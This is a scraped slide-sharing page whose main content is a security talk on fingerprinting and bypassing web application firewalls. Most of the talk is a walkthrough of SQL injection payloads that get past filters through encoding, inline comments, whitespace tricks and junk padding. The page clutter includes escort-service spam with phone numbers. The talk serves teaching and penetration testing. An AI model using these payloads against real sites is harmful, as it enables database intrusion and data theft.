Using Proxies To Secure Applications And MoreUsing Proxies To Secure Applications And More
Using Proxies To Secure Applications And More
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation Security
 
Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Introduction to Mod security session April 2016
Introduction to Mod security session April 2016
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trends
 
[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev
 
gofortution
gofortutiongofortution
gofortution
 
Everybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs tooEverybody loves html5,h4ck3rs too
Everybody loves html5,h4ck3rs too
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
Web Security
Web SecurityWeb Security
Web Security
 
Browser Security 101
Browser Security 101 Browser Security 101
Browser Security 101
 
Module 11 (hacking web servers)
Module 11 (hacking web servers)Module 11 (hacking web servers)
Module 11 (hacking web servers)
 
Web Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or SucceedWeb Application Firewall: Suckseed or Succeed
Web Application Firewall: Suckseed or Succeed
 
Application Security Workshop
Application Security Workshop Application Security Workshop
Application Security Workshop
 
Cyber ppt
Cyber pptCyber ppt
Cyber ppt
 
API SECURITY
API SECURITYAPI SECURITY
API SECURITY
 
Web Application Penetration Testing Introduction
Web Application Penetration Testing IntroductionWeb Application Penetration Testing Introduction
Web Application Penetration Testing Introduction
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
 

Recently uploaded

Class 11 Legal Studies Ch-1 Concept of State .pdf
Class 11 Legal Studies Ch-1 Concept of State .pdfClass 11 Legal Studies Ch-1 Concept of State .pdf
Class 11 Legal Studies Ch-1 Concept of State .pdfakmcokerachita
 
How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17Celine George
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxheathfieldcps1
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Krashi Coaching
 
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfBASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfSoniaTolstoy
 
URLs and Routing in the Odoo 17 Website App
URLs and Routing in the Odoo 17 Website AppURLs and Routing in the Odoo 17 Website App
URLs and Routing in the Odoo 17 Website AppCeline George
 
Crayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon ACrayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon AUnboundStockton
 
MENTAL STATUS EXAMINATION format.docx
MENTAL STATUS EXAMINATION format.docxMENTAL STATUS EXAMINATION format.docx
MENTAL STATUS EXAMINATION format.docxPoojaSen20
 
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdfssuser54595a
 
mini mental status format.docx
mini mental status format.docxmini mental status format.docx
mini mental status format.docxPoojaSen20
 
Mastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionMastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionSafetyChain Software
 
Separation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesSeparation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesFatimaKhan178732
 
Alper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentAlper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentInMediaRes1
 
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17Celine George
 
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTiammrhaywood
 
Science 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its CharacteristicsScience 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its CharacteristicsKarinaGenton
 
Interactive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationInteractive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationnomboosow
 

Recently uploaded (20)

Class 11 Legal Studies Ch-1 Concept of State .pdf
Class 11 Legal Studies Ch-1 Concept of State .pdfClass 11 Legal Studies Ch-1 Concept of State .pdf
Class 11 Legal Studies Ch-1 Concept of State .pdf
 
How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17How to Configure Email Server in Odoo 17
How to Configure Email Server in Odoo 17
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
 
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdfBASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
BASLIQ CURRENT LOOKBOOK LOOKBOOK(1) (1).pdf
 
URLs and Routing in the Odoo 17 Website App
URLs and Routing in the Odoo 17 Website AppURLs and Routing in the Odoo 17 Website App
URLs and Routing in the Odoo 17 Website App
 
Crayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon ACrayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon A
 
MENTAL STATUS EXAMINATION format.docx
MENTAL STATUS EXAMINATION format.docxMENTAL STATUS EXAMINATION format.docx
MENTAL STATUS EXAMINATION format.docx
 
TataKelola dan KamSiber Kecerdasan Buatan v022.pdf
TataKelola dan KamSiber Kecerdasan Buatan v022.pdfTataKelola dan KamSiber Kecerdasan Buatan v022.pdf
TataKelola dan KamSiber Kecerdasan Buatan v022.pdf
 
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
18-04-UA_REPORT_MEDIALITERAСY_INDEX-DM_23-1-final-eng.pdf
 
mini mental status format.docx
mini mental status format.docxmini mental status format.docx
mini mental status format.docx
 
Mastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionMastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory Inspection
 
Separation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesSeparation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and Actinides
 
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
Model Call Girl in Tilak Nagar Delhi reach out to us at 🔝9953056974🔝
 
Alper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentAlper Gobel In Media Res Media Component
Alper Gobel In Media Res Media Component
 
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
Incoming and Outgoing Shipments in 1 STEP Using Odoo 17
 
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPTECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
ECONOMIC CONTEXT - LONG FORM TV DRAMA - PPT
 
Science 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its CharacteristicsScience 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its Characteristics
 
9953330565 Low Rate Call Girls In Rohini Delhi NCR
9953330565 Low Rate Call Girls In Rohini Delhi NCR9953330565 Low Rate Call Girls In Rohini Delhi NCR
9953330565 Low Rate Call Girls In Rohini Delhi NCR
 
Interactive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationInteractive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communication
 

Waf bypassing Techniques

  • 2.  Avinash Kumar Thapa, Senior Security Analyst in Network Intelligence India  Bug Hunter on Hackerone  CTF Author on Vulnhub.com  Some exploits and PoC on Exploit-db as well.  Passionate about Web Applications Security and Exploit Writing.
  • 3. Agenda  Introduction to Web Applications Firewalls  Operation Modes  Vendors  Fingerprinting WAF  Ways to Bypass WAFs  Practical Cases for Bypassing  Conclusion
  • 4. Introduction to Web Application Firewalls  Presents as Application Layer  Monitors all HTTP/HTTPs/SOAP/XML-RPC Web services traffic between client and servers based upon their pre-defined signatures in a database.  Basic goal of WAF is to monitor and block the contents that violates pre-defined policy.  These pre-defined policies are patterns of user input which ends up in potential attack.  Understands HTTP and HTTPs traffic better than any traditional firewall.
  • 6. Negative Mode A negative security model recognize attacks by relying on a database of expected attack signatures. Example: Do not allow in any page, any argument value (user input) which match potential XSS strings like <script>,</script>, String.fromCharCode, etc. Pros: ● Less time to implement. Cons: ● Less protection.
  • 7. Positive Model  A positive security model enforces positive behaviour by learning the application logic and the building a security policy of valid known requests as a user interacts with the application. Example:  Page news.jsp, the field id could only accept characters [0-9] and starting at number 0 until 65535.  Using intval conditions on page. (Accepts only integers) Pros: ● Better performance (less rules). ● Less false positives. Cons: ● Much more time to implement. ● Some vendors provide “automatic learning mode”, they help, but are far from perfect, in the end, you always need a skilled human to review the policies
  • 8. Mix Model  Combination of both positive and negative model.
  • 9. Testing Environments  Google Chrome  Mozilla Firefox  Internet Explorer  Opera Browser
  • 10. Products  F5 BIG IP WAF  Sucuri  Modsecurity  Imperva Incapsula  PHP-IDS (PHP Intrusion Detection System)  Quick Defense  AQTRONIX WebKnight (For IIS and based on ISAPI filters)  Barracuda WAF
  • 11. Fingerprinting WAF Adds Cookie to the HTTP Communication.  For Citrix Netscaler WAF
  • 13. Fingerprinting WAF  On the basis of HTTP Response Other WAF’s may be detected by the type of http response we receive when submitting a malicious request, responses may vary depending upon a WAF to a WAF. Some of the common responses are 403, 406, 419, 500, 501 etc.
  • 15. Fingerprinting WAF  Request and Response for ModSecurity Firewall Request:
  • 16. Fingerprinting WAF  Request and Response for ModSecurity Firewall Response:
  • 17. Fingerprinting WAF  Response for WebKnight Firewall Response:
  • 18. Fingerprinting WAF  Response for WebKnight Firewall Response rendered on Browser
  • 19. Automatic Fingerprinting WAF  Using Nmap Scripts nmap -p80 --script http-waf-detect <host>  Using WaFw00f.py Python Wafw00f.py –url <URL>
  • 20. Techniques to Bypass WAFs  Bypassing WAF For SQL Injection Vulnerabilities  Bypassing WAF for XSS Issues  Bypassing WAF for LFI and RFI vulnerabilities.
  • 21. General Techniques to bypass WAF  Null Character Injection  Mixed Case  Inline Comments  Chunked Requests  Buffer Overflow  HTTP Parameter Pollution  URL encoding  Keyword Splitting  Replaced Keywords  Ignoring Cookies  Using Data URIs  Header Injection
  • 22. Bypassing WAF For SQL Injection Vulnerabilities
  • 23. https://abc.com/index.php?id=1 Example 1 (Without WAF) ‘ You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 ' at line 6 Example 1 (With WAF) https://abc.com/index.php?id=1 ‘ HTTP/1.1 403 Forbidden Error Or HTTP/1.1 406 Not Acceptable or HTTP/1.1 404 Not Found Or HTTP/1.1 500 Internal Server Error Or HTTP/1.1 400 Bad Request
  • 24. Some recon on WAF Came to know Modsecurity is in action https://abc.com/index.php?id=1 “ HTTP/1.1 200 OK https://abc.com/index.php?id=1 %27 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for right syntax to use near '1’ ' at line 6 This technique is URL Encoding Some time you need to use: 1) Double URL Encoding :- %2527%27’ 2) Triple URL Encoding:- %252525%2527%27’ (This is very rare Case)
  • 25. https://abc.com/index.php?id=1 %27 ORDER BY 1%23 HTTP/1.1 403 Forbidden Assumptions in mind • ‘Order’ keyword is Blocked ?? • ‘Order by ’ keyword is Blocked ?? • Any other alternative of Order by query ?? • Does Spaces are blocked Let’s Try 
  • 26. https://abc.com/index.php?id=1 %27 ORDER %23 HTTP/1.1 403 Forbidden Assumptions in mind • ‘Order’ keyword is Blocked • Check again ‘order’ is blocked ?? https://abc.com/index.php?id=1 %27ORDER%23 HTTP/1.1 200 OK New Assumptions in mind • ‘Order’ keyword is not Blocked • What is blocked then ??? SPACES ARE BLOCKED
  • 27. https://abc.com/index.php?id=1 %27 ORDER by 1 %23 HTTP/1.1 403 Forbidden https://abc.com/index.php?id=1 %27ORDERby1 %23 HTTP/1.1 200 OK No Assumptions in mind Because spaces are blocked only
  • 28. Techniques to bypass spaces Using ‘+’ instead of space like:- order+by+1 (Mostly blocked) Using inline comments instead of spaces ‘/**/’ like:- order/**/by/**/1 Using combination of inline comments and URL encoding instead of spaces like: • Order/%2a%2a/by/%2a%2a/1 • Order%2f**%2fby%2f**%2f1 Using combination of inline comments, URL encoding & Junk Characters instead of spaces like: • Order/%2aJUNKCHARACTERS%2a/by/%2aJUNKCHARACTERS%2a/1 • Order%2f*JUNKCHARACTERS*%2fby%2f**JUNKCHARACTERS%2f1
  • 29. Techniques to bypass spaces Using white space characters %0a, %0b, %0c, %0d,%a0,%09,%01 Query will be  ORDER%0aby%0a1  ORDER%0bby%0b1  ORDER%0cby%0c1  ORDER%0Dby%0D1  ORDER%A0by%A01  ORDER%0D%0Aby%0D%0A1
  • 30. https://abc.com/index.php?id=1 %27/**/ORDER/**/by/**/1%23 HTTP/1.1 200 OK Let’s Suppose no. of columns are 3 https://abc.com/index.php?id=1 %27 UNION SELECT 1,2,3%23 HTTP/1.1 403 Forbidden Assumptions in mind • ‘Spaces’ are Blocked ??
  • 31. https://abc.com/index.php?id=1 %27/**/UNION/**/SELECT/**/1,2,3%23 HTTP/1.1 403 Forbidden Assumptions in mind • ‘Spaces’ were bypassed using inline comments..…Still blocked??? • ‘UNION’ keyword is blocked ?? • ‘SELECT’ keyword is blocked ?? • ‘Intergers’ are blocked ?? • ‘Commas’ are blocked ? • Combination of “UNION SELECT” is blocked • “SELECT with Integers” are blocked
  • 32. Techniques to Bypass Using Inline comments:  /!*50000UNION*/  /*!40000UNION*/  /*!00000UNION*/ If UNION is blocked Using URL Encoding Techniques:  %53nion  %2553nion  %55%4e%49%4f%4e (UNION) Double URL Encoding Triple URL Encoding
  • 33. https://abc.com/index.php?id=1 %27/**//*!50000UNION*//**/SELECT/**/1,2,3%23 https://abc.com/index.php?id=1 %27/**//*!40000UNION*//**/SELECT/**/1,2,3%23 https://abc.com/index.php?id=1 %27/**//*!%55NION*//**/SELECT/**/1,2,3%23 https://abc.com/index.php?id=1 %27/**//*!%55NIoN*//**/SELECT/**/1,2,3%23 HTTP/1.1 403 Forbidden Assumptions in mind • ‘UNION’ keyword is blocked ?? • ‘SELECT’ keyword is blocked ?? • ‘Intergers’ are blocked ?? • ‘Commas’ are blocked ? • Combination of “UNION SELECT” is blocked • “SELECT with Integers” are blocked
  • 34. https://abc.com/index.php?id=1 %27/**//*!50000UNION*//**//*!50000SELECT*//**/1,2,3%23 https://abc.com/index.php?id=1 %27/**//*!40000UNION*//**//*!40000SELECT*//**/1,2,3%23 https://abc.com/index.php?id=1 %27/**//*!%55NION*//**//*!%53ELECT*//**/1,2,3%23 https://abc.com/index.php?id=1 %27/**//*!%55NIoN*//**//*!%53ELeCT*//**/1,2,3%23 HTTP/1.1 403 Forbidden Assumptions in mind • ‘UNION’ keyword is blocked ?? • ‘SELECT’ keyword is blocked ?? • ‘Intergers’ are blocked ?? • ‘Commas’ are blocked ? • Combination of “UNION SELECT” is blocked • “SELECT with Integers” are blocked
  • 35. https://abc.com/index.php?id=1 %27/**//*!50000UNION*/1,2,3%23 HTTP/1.1 200 OK https://abc.com/index.php?id=1 %27/**//*!50000SELECT*/1,2,3%23 HTTP/1.1 200 OK Assumptions in mind • ‘UNION’ keyword is NOT blocked. • ‘SELECT’ keyword is NOT blocked. • ‘Intergers’ are NOT blocked • ‘Commas’ are NOT blocked • Combination of “UNION SELECT” is blocked ? • “SELECT with Integers” are NOT blocked
  • 36. Techniques to bypass combination of “union select” Using combination of inline comments and URL encoding : • /*!50000%55niOn*/ /*!50000%53eLECT*/ Using white spaces and URL encoding of comments (#) • Union%23%0aSELECT • Union%23%0bSELECT • Union%23%0cSELECT • Union%23%0DSELECT • Union%23%A0SELECT Using combination of inline comments and URL encoding : • /*!50000%55niOn*/ /*!50000%53eLECT*/
  • 37. Techniques to bypass combination of “union select” Using Buffer Overflow UNION%23ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890%0ASELECT Some time need to increase the junk as per the requirement UNION%23XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXX%0ASELECT
  • 38. Techniques to bypass combination of “union select” Using Distinct statement UNION DISTINCT SELECT Using Distinctrow statement UNION DISTINCTROW SELECT
  • 40. Special Case : What if Commas got blocked ?
  • 41. https://abc.com/index.php?id=1 %27/**/UNION/**/SELECT/**/1,2,3%23 HTTP/1.1 403 Forbidden Assumptions in mind • ‘UNION’ keyword is NOT blocked. • ‘SELECT’ keyword is NOT blocked. • ‘Intergers’ are NOT blocked • ‘Commas’ are blocked • Combination of “UNION SELECT” is NOT blocked ? • “SELECT with Integers” are NOT blocked Time to bypass commas “,”.
  • 42. Basic Bypasses  URL Encoding - %2c  ,  Double URL Encoding - %252c  %2c  ,  Using Inline Comments - /*!*/ like UNION SELECT 1/*!,*/2
  • 43. Basic Bypasses  URL Encoding - %2c  ,  Double URL Encoding - %252c  %2c  ,  Using Inline Comments - /*!*/ like UNION SELECT 1/*!,*/2
  • 44. Advance way to bypass “Commas”  Using JOIN  JOIN used for columns as UNION is used for the rows  We have SELECT 1,2,3  SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c
  • 45. Advance way to bypass “Commas” https://abc.com/index.php?id=1 %27/**/UNION/**/SELECT/**/*/**/FROM/**/(SELECT/**/1)a/**/J OIN/**/(SELECT/**/2)b%23 HTTP/1.1 200 OK
  • 46. Similar Approach for other Vulnerabilities  For XSS  For LFI / RFI DEMO TIME 
  • 47. References  Images in slides 10,11,14,15,16,17  Taken from http://www.mediafire.com/download/7a57hv5z25s58lh/WAF_Bypassing_By_RAFAYB ALOCH.pdf Thank you..!

Editor's Notes

  1. ISAPI Filters are the dlls which are used to enhance the functionality of IIS server. It is only available on IIS servers